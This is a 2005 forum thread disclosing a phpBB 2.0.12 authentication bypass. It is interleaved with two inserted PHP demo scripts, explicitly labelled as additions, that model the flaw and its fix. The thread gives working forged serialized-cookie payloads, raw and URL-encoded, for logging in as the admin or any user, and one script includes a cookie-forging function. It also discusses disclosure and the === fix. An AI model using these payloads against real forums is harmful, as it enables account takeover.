Waraxe IT Security Portal  
www.waraxe.us Forum Index -> PhpBB
phpbb v. 2.0.12 and earlier authendication bypass
Posted: Sat Feb 26, 2005 11:20 pm
Heintz (Valuable expert) - Joined: Jun 12, 2004, Posts: 88, Location: Estonia/Sweden

Bug author: Heintz (Henno Joosep)
Related site: http://www.waraxe.us
Date of finding: 24.02.2005

The problem is in sessions.php, which is in the /includes directory.

$sessiondata = isset($HTTP_COOKIE_VARS[$cookiename . '_data']) ? unserialize(stripslashes($HTTP_COOKIE_VARS[$cookiename . '_data'])) : array();

Here we see an array being unserialized.

if( $sessiondata['autologinid'] == $auto_login_key )
{
// autologinid matches password
$login = 1;
$enable_autologin = 1;
}


The problem is that the if() uses the == operator, which considers the statement
true if one side is boolean(true), and that we can achieve by unserializing
a bool instead of an empty string.

Exploitation:
This could be a normal admin session cookie:
a:2:{s:11:"autologinid";s:0:"";s:6:"userid";s:1:"2";}

The attacker would make an array with the autologinid key set to boolean(true), so:
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}

For this to work in a real situation it must be urlencoded, and this is how it should look to
obtain the user with id 2 (usually admin):
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D


To use a bigger user id, change the
number at the end:

a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"7";}

If dealing with higher ids you must specify s:N (N being how many digits the id has);
example below:

a:2:{s:11:"autologinid";b:1;s:6:"userid";s:4:"1234";}

I stated that using "===" as the conditional operator would be a "quick fix", which the phpbb
team used (they didn't have time to explore the bug in depth, look below for notes).

Originally I tried/explored the advantages of using unserialize
to unserialize database objects, but using objects as arrays creates a fatal error
(possible full path disclosure???).

Notes:
The software authors decided not to credit me because I posted the info publicly,
not giving them enough time.

-- brought up --


Last edited by Heintz on Sat Apr 09, 2005 5:46 pm; edited 4 times in total

_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"
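The check and the forged cookie from the post above, modelled as a stand-alone PHP script. This is an added example written for this page, not phpBB's code and not Heintz's: it reproduces the 2.0.12 comparison with ==, the "quick fix" with ===, and builds the attacker cookie with serialize()/urlencode() so the s:N byte-length rule and the url-encoded form can be checked against the post. The stored key value (an md5 of a made-up password) is an assumption for the demo; in phpBB it is the user's password hash, per the comment in the original snippet. The allowed_classes option and the empty-key guard in the fixed version are extra hardening added here, not part of the fix the thread describes.

```php
<?php
// Added example, not phpBB's code: a stand-alone model of the autologin check
// from includes/sessions.php in phpBB 2.0.12, the "quick fix" with ===, and the
// forged cookie from the post built with serialize()/urlencode().

// The 2.0.12 check: loose == on whatever unserialize() produced from the cookie.
function autologin_vulnerable(string $cookie_data, string $auto_login_key): bool
{
    $sessiondata = unserialize(stripslashes($cookie_data));
    if (!is_array($sessiondata) || !isset($sessiondata['autologinid'])) {
        return false;
    }
    // With a boolean on one side PHP converts the other side to bool:
    // any non-empty string other than "0" becomes true, so true == "<hash>"
    // holds for every real password hash.
    return $sessiondata['autologinid'] == $auto_login_key;
}

// The 2.0.13 "quick fix": === also compares types, so b:1 no longer matches a
// string. allowed_classes (PHP 7.0+) blocks object injection through the cookie,
// and the empty-key guard stops an empty stored key from matching s:0:"".
// Both are additions made here, not part of the thread's fix.
function autologin_fixed(string $cookie_data, string $auto_login_key): bool
{
    $sessiondata = unserialize(stripslashes($cookie_data), ['allowed_classes' => false]);
    if (!is_array($sessiondata) || !isset($sessiondata['autologinid'])) {
        return false;
    }
    return $auto_login_key !== '' && $sessiondata['autologinid'] === $auto_login_key;
}

// Forge the attacker's cookie for any user id. serialize() writes s:N with N equal
// to the byte length of the string, which is the s:4:"1234" point from the post.
function forge_cookie(string $user_id): string
{
    return serialize(['autologinid' => true, 'userid' => $user_id]);
}

$auto_login_key = md5('hunter2');   // assumed stored key for the demo; never empty

// The legitimate admin cookie quoted in the post (autologinid is the empty string).
$legit  = 'a:2:{s:11:"autologinid";s:0:"";s:6:"userid";s:1:"2";}';
$forged = forge_cookie('2');

echo "forged:        ", $forged, "\n";
echo "forged (1234): ", forge_cookie('1234'), "\n";
echo "url-encoded:   ", urlencode($forged), "\n";
foreach (['legit' => $legit, 'forged' => $forged] as $name => $cookie) {
    printf("%-6s vulnerable=%s fixed=%s\n", $name,
        var_export(autologin_vulnerable($cookie, $auto_login_key), true),
        var_export(autologin_fixed($cookie, $auto_login_key), true));
}
```

Run it with PHP 7.0 or later. The vulnerable check rejects the legitimate cookie (its autologinid is the empty string, which is not the key) but accepts the forged one, while the strict check rejects both; the url-encoded line is byte for byte the cookie value quoted in the post, and the 1234 variant shows serialize() emitting s:4 on its own. For a real autologin key, a timing-safe comparison such as hash_equals() after the type check is the usual next step beyond what the thread discusses.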
Posted: Sun Feb 27, 2005 3:32 pm
LINUX (Moderator) - Joined: May 24, 2004, Posts: 404, Location: Caiman

:) :D Fully tested, and it works perfectly. Excellent work.
Posted: Sun Feb 27, 2005 5:28 pm
Injector (Active user) - Joined: Dec 29, 2004, Posts: 49

I decoded both and tried to analyze it, but I still don't get how to do it. What if I don't want user id 2, what if I want user id 7? How do I do that?
Posted: Mon Feb 28, 2005 12:31 am
Grullanetx (Beginner) - Joined: Feb 18, 2005, Posts: 2

Hi all!

phpBB 2.0.13 released - Critical Update

The path disclosure bug in viewtopic.php is fixed too!

Regards!
Posted: Mon Feb 28, 2005 4:37 am
Exoduks (Beginner) - Joined: Jan 12, 2005, Posts: 3

Does anyone know how to exploit this session handling bug?
Posted: Mon Feb 28, 2005 5:13 am
y3dips (Valuable expert) - Joined: Feb 25, 2005, Posts: 281, Location: Indonesia

Hmm, nice research you've done there.

I've tried to download that version, but the development team already updated it :)

Now I'm trying the new one (2.0.13).

Long time no play with phpBB :) (even though my forum uses it too :( )

_________________
IO::y3dips->new(http://clog.ammar.web.id);
For comparing Strings use ===
Posted: Mon Feb 28, 2005 8:40 am
Zeelock (Active user) - Joined: Jan 27, 2005, Posts: 29, Location: Where stars come out at night

Heintz, great job.

Even if it's a common trick and well documented, I hadn't noticed it yet (:o).

This error is very common when converting Perl scripts into PHP.

For more info:

http://www.php.net/manual/it/language.operators.comparison.php

Quote:
jwhiting at hampshire dot edu
09-Dec-2003 06:31
note: the behavior below is documented in the appendix K about type comparisons, but since it is somewhat buried i thought i should raise it here for people since it threw me for a loop until i figured it out completely.

just to clarify a tricky point about the == comparison operator when dealing with strings and numbers:

('some string' == 0) returns TRUE

however, ('123' == 0) returns FALSE

also note that ((int) 'some string') returns 0

and ((int) '123') returns 123

the behavior makes sense but you must be careful when comparing strings to numbers, e.g. when you're comparing a request variable which you expect to be numeric. it's easy to fall into the trap of:

if ($_GET['myvar']==0) dosomething();

as this will dosomething() even when $_GET['myvar'] is 'some string' and clearly not the value 0

i was getting lazy with my types since php vars are so flexible, so be warned to pay attention to the details...


Exploit n. 2 Censored.....


Last edited by Zeelock on Mon Feb 28, 2005 1:54 pm; edited 6 times in total

_________________
If it seems to be impossible, just step up your level!
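The string-versus-number trap from the manual comment quoted above, as an added example written for this page (not from the thread or the PHP manual): the loose check on a request parameter, one safe way to write it, and a caveat the 2003 comment could not know. PHP 8.0 changed int-to-string comparison so that a non-numeric string is no longer cast to 0; the script prints the running version so the two behaviours can be seen side by side. The $_GET values are constructed inline for the demo rather than read from a request.

```php
<?php
// Added example, not from the thread: the $_GET['myvar'] == 0 trap from the
// quoted manual comment, a validated strict check, and the PHP 8 behaviour change.
// The sample values stand in for request parameters and are constructed here.

// The trap: loose comparison of a request string against the integer 0.
// PHP 5/7 cast the string to a number first, so 'some string' and '' both
// become 0 and match. Since PHP 8.0 a non-numeric string is compared to the
// int as a string instead, so only numeric strings equal to zero match.
function is_zero_loose($value): bool
{
    return $value == 0;
}

// Validate, then compare strictly: FILTER_VALIDATE_INT yields int 0 only for a
// string that really is the integer zero and false for anything else, so the
// result is the same on every PHP version.
function is_zero_strict($value): bool
{
    return filter_var($value, FILTER_VALIDATE_INT) === 0;
}

$samples = ['0', '123', 'some string', ''];   // constructed request values
printf("PHP %s\n", PHP_VERSION);
foreach ($samples as $myvar) {
    printf("%-14s loose: %-5s  strict: %s\n", var_export($myvar, true),
        var_export(is_zero_loose($myvar), true),
        var_export(is_zero_strict($myvar), true));
}
```

On PHP 5 and 7 the loose column is true for '0', 'some string' and '' and false for '123', exactly the trap the comment describes; on PHP 8 it is true only for '0'. The strict column is true only for '0' on every version, which is the behaviour a request-parameter check should have regardless of interpreter upgrades.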
Posted: Mon Feb 28, 2005 10:37 am
sygma (Regular user) - Joined: Nov 21, 2004, Posts: 7

Why was the info censored? Could someone please PM the info? Thanks.

_________________
no word to save thee
Posted: Mon Feb 28, 2005 11:03 am
Zeelock (Active user) - Joined: Jan 27, 2005, Posts: 29, Location: Where stars come out at night

I think that Janek censored the message, because it's really harmful at the moment.

Posted: Mon Feb 28, 2005 1:51 pm
Heintz (Valuable expert) - Joined: Jun 12, 2004, Posts: 88, Location: Estonia/Sweden

I was the one censoring it, because the phpbb guys didn't like the idea of posting about the issue before/at the same time as them.

And I would appreciate it if we do not provide exploitation info for some amount of time (2 days).

I thought better of people, but it seems there are just too many script kiddies out there who start doing damage whenever possible. :(


http://www.phpbb.com/phpBB/viewtopic.php?t=267563


Last edited by Heintz on Mon Feb 28, 2005 3:37 pm; edited 1 time in total

Posted: Mon Feb 28, 2005 1:53 pm
Zeelock (Active user) - Joined: Jan 27, 2005, Posts: 29, Location: Where stars come out at night

If you want, I'll censor the info as well.

Posted: Thu Mar 03, 2005 1:05 pm
Heintz (Valuable expert) - Joined: Jun 12, 2004, Posts: 88, Location: Estonia/Sweden

---move---

Notes:
The software authors decided not to credit me because I posted the info publicly,
not giving them enough time.


Last edited by Heintz on Wed May 04, 2005 1:26 am; edited 2 times in total

Posted: Thu Mar 03, 2005 2:23 pm
lone_wolf (Regular user) - Joined: Feb 20, 2005, Posts: 9

Heintz, what exactly does the triple equal from the "quick fix" do? Is there some way to cheat it?
Posted: Thu Mar 03, 2005 2:39 pm
lone_wolf (Regular user) - Joined: Feb 20, 2005, Posts: 9

This looks pretty hopeless (from the "Boolean" manual page):


/* Note the triple equal sign, this is the "exactly equal to" operator,
which checks NOT JUST FOR EQUALITY, BUT FOR TYPE. Using it
ensures that $bool doesn't get converted to a boolean
for the comparison: $bool===true is only true
if $bool is a true boolean, whereas $bool==true
is true for any non-empty string (except "0").
*/
Posted: Sun Mar 13, 2005 4:42 pm
y3dips (Valuable expert) - Joined: Feb 25, 2005, Posts: 281, Location: Indonesia

Heintz wrote:

<-- message truncated --->

I stated that using "===" as the conditional operator would be a "quick fix", which the phpbb
team used (they didn't have time to explore the bug in depth, look below for notes).

Originally I tried/explored the advantages of using unserialize
to unserialize database objects, but using objects as arrays creates a fatal error
(possible full path disclosure???).

Notes:
The software authors decided not to credit me because I posted the info publicly,
thus not giving them enough time (big mistake by me), and therefore there may be stealers
claiming the bug to be theirs.


I have another way to fix it, because I found the same error as you did.

All times are GMT
Page 1 of 2

(c) 2004-2013 Janek Vind "waraxe". All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters.